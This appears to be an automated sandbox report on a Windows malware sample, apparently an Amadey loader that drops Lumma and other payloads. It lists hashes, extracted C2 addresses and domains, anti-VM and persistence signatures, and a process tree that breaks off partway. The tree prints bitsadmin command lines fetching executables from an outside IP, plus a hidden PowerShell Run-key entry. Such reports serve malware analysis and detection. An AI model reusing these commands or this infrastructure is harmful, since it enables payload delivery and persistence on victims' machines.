Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28/11/2024, 19:01
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20241010-en
General
-
Target
file.exe
-
Size
1.8MB
-
MD5
2973a8b36517005333545a7751a03f4f
-
SHA1
ea5f6788309a5beb6d85f0e3abbe588598a7023b
-
SHA256
126e371440a1d6372b23741aa24bd4b0ed00e7f90657a796b18c6c05ba003ae9
-
SHA512
307406fb0a9a55d3cf54da1b2bfac2313defce6eb66e60ad832cb3915a642ebe54e26c85304c96ee1e63cd6ee0878a3b2a91e3cfa1e6771c4776a374daa22b67
-
SSDEEP
49152:RzHJLfl5MUuB+8x+C4UMIdS35uAnpo7RevACJE5/A:91t5lpC1hkuAncIoCJE
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://tail-cease.cyou
Extracted
lumma
https://tail-cease.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nbea1t8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a24584cedc.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 74 4516 powershell.exe 77 4516 powershell.exe -
pid Process 4516 powershell.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
pid Process 2936 bitsadmin.exe 2284 bitsadmin.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a24584cedc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a24584cedc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation skotes.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 11 IoCs
pid Process 2176 skotes.exe 2040 TaskbarMonitorInstaller.exe 1784 skotes.exe 1620 nbea1t8.exe 4424 tvtC9D3.exe 2060 uxN4wDZ.exe 4048 uxN4wDZ.exe 4564 skotes.exe 4408 TcMBq5M.exe 4464 feAo1nZ.exe 3464 a24584cedc.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine nbea1t8.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine a24584cedc.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe -
Loads dropped DLL 9 IoCs
pid Process 5084 regasm.exe 5084 regasm.exe 5084 regasm.exe 5084 regasm.exe 4424 tvtC9D3.exe 4424 tvtC9D3.exe 4424 tvtC9D3.exe 2924 MsiExec.exe 2924 MsiExec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1009905001\\nbea1t8.exe'\"" nbea1t8.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: TcMBq5M.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: TcMBq5M.exe File opened (read-only) \??\S: TcMBq5M.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: TcMBq5M.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: TcMBq5M.exe File opened (read-only) \??\E: TcMBq5M.exe File opened (read-only) \??\I: TcMBq5M.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: TcMBq5M.exe File opened (read-only) \??\O: TcMBq5M.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: TcMBq5M.exe File opened (read-only) \??\Q: TcMBq5M.exe File opened (read-only) \??\Y: TcMBq5M.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: TcMBq5M.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: TcMBq5M.exe File opened (read-only) \??\U: TcMBq5M.exe File opened (read-only) \??\X: TcMBq5M.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\V: TcMBq5M.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: TcMBq5M.exe File opened (read-only) \??\Z: TcMBq5M.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\H: TcMBq5M.exe File opened (read-only) \??\W: TcMBq5M.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: TcMBq5M.exe File opened (read-only) \??\N: TcMBq5M.exe File opened (read-only) \??\J: msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 4932 file.exe 2176 skotes.exe 1784 skotes.exe 1620 nbea1t8.exe 4564 skotes.exe 3464 a24584cedc.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2060 set thread context of 4048 2060 uxN4wDZ.exe 106 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\TaskbarMonitor\TaskbarMonitor.dll TaskbarMonitorInstaller.exe File created C:\Program Files\TaskbarMonitor\Newtonsoft.Json.dll TaskbarMonitorInstaller.exe File created C:\Program Files\TaskbarMonitor\TaskbarMonitorWindows11.exe TaskbarMonitorInstaller.exe File created C:\Program Files\TaskbarMonitor\TaskbarMonitorInstaller.exe TaskbarMonitorInstaller.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job file.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tvtC9D3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language feAo1nZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nbea1t8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TcMBq5M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a24584cedc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2132 ping.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d4141155d34ac580000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d4141150000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d414115000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d414115000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d41411500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Modifies registry class 25 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0 regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\Implemented Categories regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\ = "taskbar-monitor" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TaskbarMonitor.Deskband\ = "TaskbarMonitor.Deskband" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32} regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\ = "TaskbarMonitor.Deskband" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\ = "mscoree.dll" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TaskbarMonitor.Deskband regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\Class = "TaskbarMonitor.Deskband" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0\CodeBase = "file:///C:/Program Files/TaskbarMonitor/TaskbarMonitor.DLL" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\ProgId regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\RuntimeVersion = "v4.0.30319" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\CodeBase = "file:///C:/Program Files/TaskbarMonitor/TaskbarMonitor.DLL" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0\Class = "TaskbarMonitor.Deskband" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0\RuntimeVersion = "v4.0.30319" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TaskbarMonitor.Deskband\CLSID regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32 regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\ThreadingModel = "Both" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\Assembly = "TaskbarMonitor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\Implemented Categories\{62C8FE65-4EBB-45e7-B440-6E39B2CDBF29} regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\Implemented Categories\{00021492-0000-0000-c000-000000000046} regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TaskbarMonitor.Deskband\CLSID\ = "{13790826-15FA-46D0-9814-C2A5C6C11F32}" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0\Assembly = "TaskbarMonitor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\ProgId\ = "TaskbarMonitor.Deskband" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Component Categories\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29}\0 = ".NET Category" regasm.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2132 ping.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 4932 file.exe 4932 file.exe 2176 skotes.exe 2176 skotes.exe 1784 skotes.exe 1784 skotes.exe 1620 nbea1t8.exe 1620 nbea1t8.exe 4564 skotes.exe 4564 skotes.exe 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 3464 a24584cedc.exe 3464 a24584cedc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1896 msiexec.exe Token: SeCreateTokenPrivilege 4408 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4408 TcMBq5M.exe Token: SeLockMemoryPrivilege 4408 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4408 TcMBq5M.exe Token: SeMachineAccountPrivilege 4408 TcMBq5M.exe Token: SeTcbPrivilege 4408 TcMBq5M.exe Token: SeSecurityPrivilege 4408 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 4408 TcMBq5M.exe Token: SeLoadDriverPrivilege 4408 TcMBq5M.exe Token: SeSystemProfilePrivilege 4408 TcMBq5M.exe Token: SeSystemtimePrivilege 4408 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 4408 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 4408 TcMBq5M.exe Token: SeCreatePagefilePrivilege 4408 TcMBq5M.exe Token: SeCreatePermanentPrivilege 4408 TcMBq5M.exe Token: SeBackupPrivilege 4408 TcMBq5M.exe Token: SeRestorePrivilege 4408 TcMBq5M.exe Token: SeShutdownPrivilege 4408 TcMBq5M.exe Token: SeDebugPrivilege 4408 TcMBq5M.exe Token: SeAuditPrivilege 4408 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 4408 TcMBq5M.exe Token: SeChangeNotifyPrivilege 4408 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 4408 TcMBq5M.exe Token: SeUndockPrivilege 4408 TcMBq5M.exe Token: SeSyncAgentPrivilege 4408 TcMBq5M.exe Token: SeEnableDelegationPrivilege 4408 TcMBq5M.exe Token: SeManageVolumePrivilege 4408 TcMBq5M.exe Token: SeImpersonatePrivilege 4408 TcMBq5M.exe Token: SeCreateGlobalPrivilege 4408 TcMBq5M.exe Token: SeCreateTokenPrivilege 4408 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4408 TcMBq5M.exe Token: SeLockMemoryPrivilege 4408 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4408 TcMBq5M.exe Token: SeMachineAccountPrivilege 4408 TcMBq5M.exe Token: SeTcbPrivilege 4408 TcMBq5M.exe Token: SeSecurityPrivilege 4408 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 4408 TcMBq5M.exe Token: SeLoadDriverPrivilege 4408 TcMBq5M.exe Token: SeSystemProfilePrivilege 4408 TcMBq5M.exe Token: SeSystemtimePrivilege 4408 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 4408 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 4408 TcMBq5M.exe Token: SeCreatePagefilePrivilege 4408 TcMBq5M.exe Token: SeCreatePermanentPrivilege 4408 TcMBq5M.exe Token: SeBackupPrivilege 4408 TcMBq5M.exe Token: SeRestorePrivilege 4408 TcMBq5M.exe Token: SeShutdownPrivilege 4408 TcMBq5M.exe Token: SeDebugPrivilege 4408 TcMBq5M.exe Token: SeAuditPrivilege 4408 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 4408 TcMBq5M.exe Token: SeChangeNotifyPrivilege 4408 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 4408 TcMBq5M.exe Token: SeUndockPrivilege 4408 TcMBq5M.exe Token: SeSyncAgentPrivilege 4408 TcMBq5M.exe Token: SeEnableDelegationPrivilege 4408 TcMBq5M.exe Token: SeManageVolumePrivilege 4408 TcMBq5M.exe Token: SeImpersonatePrivilege 4408 TcMBq5M.exe Token: SeCreateGlobalPrivilege 4408 TcMBq5M.exe Token: SeCreateTokenPrivilege 4408 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4408 TcMBq5M.exe Token: SeLockMemoryPrivilege 4408 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4408 TcMBq5M.exe Token: SeMachineAccountPrivilege 4408 TcMBq5M.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4932 file.exe 4408 TcMBq5M.exe 2788 msiexec.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 4932 wrote to memory of 2176 4932 file.exe 82 PID 4932 wrote to memory of 2176 4932 file.exe 82 PID 4932 wrote to memory of 2176 4932 file.exe 82 PID 2176 wrote to memory of 2040 2176 skotes.exe 90 PID 2176 wrote to memory of 2040 2176 skotes.exe 90 PID 2040 wrote to memory of 5084 2040 TaskbarMonitorInstaller.exe 92 PID 2040 wrote to memory of 5084 2040 TaskbarMonitorInstaller.exe 92 PID 2176 wrote to memory of 1620 2176 skotes.exe 97 PID 2176 wrote to memory of 1620 2176 skotes.exe 97 PID 2176 wrote to memory of 1620 2176 skotes.exe 97 PID 2176 wrote to memory of 4424 2176 skotes.exe 98 PID 2176 wrote to memory of 4424 2176 skotes.exe 98 PID 2176 wrote to memory of 4424 2176 skotes.exe 98 PID 4424 wrote to memory of 2132 4424 tvtC9D3.exe 99 PID 4424 wrote to memory of 2132 4424 tvtC9D3.exe 99 PID 4424 wrote to memory of 2132 4424 tvtC9D3.exe 99 PID 4424 wrote to memory of 2936 4424 tvtC9D3.exe 101 PID 4424 wrote to memory of 2936 4424 tvtC9D3.exe 101 PID 4424 wrote to memory of 2936 4424 tvtC9D3.exe 101 PID 2176 wrote to memory of 2060 2176 skotes.exe 104 PID 2176 wrote to memory of 2060 2176 skotes.exe 104 PID 2176 wrote to memory of 2060 2176 skotes.exe 104 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 2060 wrote to memory of 4048 2060 uxN4wDZ.exe 106 PID 4424 wrote to memory of 2284 4424 tvtC9D3.exe 107 PID 4424 wrote to memory of 2284 4424 tvtC9D3.exe 107 PID 4424 wrote to memory of 2284 4424 tvtC9D3.exe 107 PID 2176 wrote to memory of 4408 2176 skotes.exe 110 PID 2176 wrote to memory of 4408 2176 skotes.exe 110 PID 2176 wrote to memory of 4408 2176 skotes.exe 110 PID 1896 wrote to memory of 2924 1896 msiexec.exe 113 PID 1896 wrote to memory of 2924 1896 msiexec.exe 113 PID 1896 wrote to memory of 2924 1896 msiexec.exe 113 PID 4408 wrote to memory of 2788 4408 TcMBq5M.exe 114 PID 4408 wrote to memory of 2788 4408 TcMBq5M.exe 114 PID 4408 wrote to memory of 2788 4408 TcMBq5M.exe 114 PID 2176 wrote to memory of 4464 2176 skotes.exe 117 PID 2176 wrote to memory of 4464 2176 skotes.exe 117 PID 2176 wrote to memory of 4464 2176 skotes.exe 117 PID 4464 wrote to memory of 4516 4464 feAo1nZ.exe 118 PID 4464 wrote to memory of 4516 4464 feAo1nZ.exe 118 PID 4464 wrote to memory of 4516 4464 feAo1nZ.exe 118 PID 2176 wrote to memory of 3464 2176 skotes.exe 120 PID 2176 wrote to memory of 3464 2176 skotes.exe 120 PID 2176 wrote to memory of 3464 2176 skotes.exe 120 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe"C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe" /nologo /codebase "C:\Program Files\TaskbarMonitor\TaskbarMonitor.dll"4⤵
- Loads dropped DLL
- Modifies registry class
PID:5084
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1620
-
-
C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.84⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2132
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2936
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2284
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2060 -
